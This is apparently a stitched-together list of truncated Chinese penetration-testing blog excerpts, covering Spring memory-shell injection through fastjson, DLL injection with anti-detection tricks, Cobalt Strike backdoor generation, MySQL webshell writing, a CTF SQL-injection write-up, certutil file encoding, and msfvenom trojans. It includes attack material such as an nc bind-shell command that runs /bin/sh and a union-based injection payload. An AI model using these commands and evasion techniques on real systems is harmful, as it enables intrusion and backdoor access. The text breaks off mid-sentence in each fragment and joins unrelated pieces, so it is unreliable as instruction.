Spring支持如下三种方式创建Bean1：调用构造器创建Bean2：调用静态工厂方法创建Bean3：调用实例工厂方法创建Bean注解@Bean方式Xml方式BeanDefinitionBuilder方式。

注意springboot版本过高注入失败，会报错。springboot版本2.4.5。可以看的spring内存马注入成功。fastjson版本1.2.24。我们版本不变，换个内存马再打一遍。Test.java（内存马）可以看到报错了，报错为。

getAdvapi32()函数也是LoadLibrary(“advapi32.dll”)的变形，和getKernel32作用一样，只不过是函数所在的dll不同，写成汇编形式避免检测，但是使用getAdvapi32()生成会无法注入（具体原因不清除，之后再研究吧），那么我这里注释掉，仅仅用了getKernel32函数。获得的pCFA就是原始的CreateFileA函数了，只不过被我们定义成了自己的，

一.Payload介绍Payload在渗透测试中大家可以简单地理解为一段漏洞利用/植入后门的代码或程序二.Cobaltstrike生成后门1.HTML Application（生成基于HTML的攻击载荷，比如可执行文件，Powershell,VBA）HTML Application用于生成hta类型的文件。HTA是HTML Application的缩写（HTML应用程序），是软件开发的新概念，直接

前言在所有常用的关系数据库管理系统中均包含内置的向服务器文件系统写文件的功能，通过这些内置的功能，我们可以将自己的webshell写目录或文件进去写入webshell条件1.MYSQL用secure_file_priv这个配置项来完成对数据导入导出的限制，如果secure_file_priv=NULL，MYSQL服务会禁止导入和导出操作。如果secure_file_priv=/tmp/，MYSQL

[极客大挑战 2019]BabySQL1[目标]Sql注入[环境]Buuctf[工具]浏览器[分析]1.直接试万能密码发现无法登录2.直接进行sql注入尝试1’ order by 3# 发现order中的or被过滤，同时by也被过滤因此直接尝试联合注入Payload:1’union select 1#&password=1Url:1%27union%20select%201%23&

Certutil包含一个编码参数（编码）。这有助于在Base64中编码文件的内容。这是在Windows中等效于Linux中的base64命令。不能打开.exe可执行文件时候，可以使用certutil对可执行文件进行编码。然后传输编码后的数据，然后在接收机上对其进行解码。这里创建一个名为test.txt的文本文件，输入一些内容，打开powershell命令：Add-Content test.txt

本次演示在linux环境下一般用外网机器对内网机器进行访问时，多用反向shell，内网机器与内网机器之间多用正向shell正向shell由于内网及其属于边界服务器，因此我们先进行正向shell演示（正向shell是在目标机器上进行监听）：内网机器上命令：nc -lvp 4444 -e /bin/sh本地机器上命令：nc 10.0.78.41 4444显示已经连接进行验证：说明正向连接成功反向she

最近在学后渗透，首先实验一下获取普通session虚拟机实验环境：1.kali2.win7实验步骤：1.在kali终端中打开msfconsole控制台2.进入侦听模块3.再次开启一个终端进行（shift+ctrl+T）,查看本机ip4.利用msfvenom制作木马程序说明：-p payload(有效载荷) 通俗的讲payload是用来建立目标机与攻击机稳定连接的，可以返回shell-e 编码方式-

CobaltStrike是一款非常强大的工具，和MSF类似，但功能更加强大。首先CobaltStrike文件包下载下之后，服务器端是只支持在linux系统中的，同时这个工具是需要java环境的，官方提倡大家使用，但我这里为了方便就安装的ubuntu里简单的openjdk-8-jdk：Java安装步骤：1.先更新源，命令sudo apt-get update2.java -version（有的话当然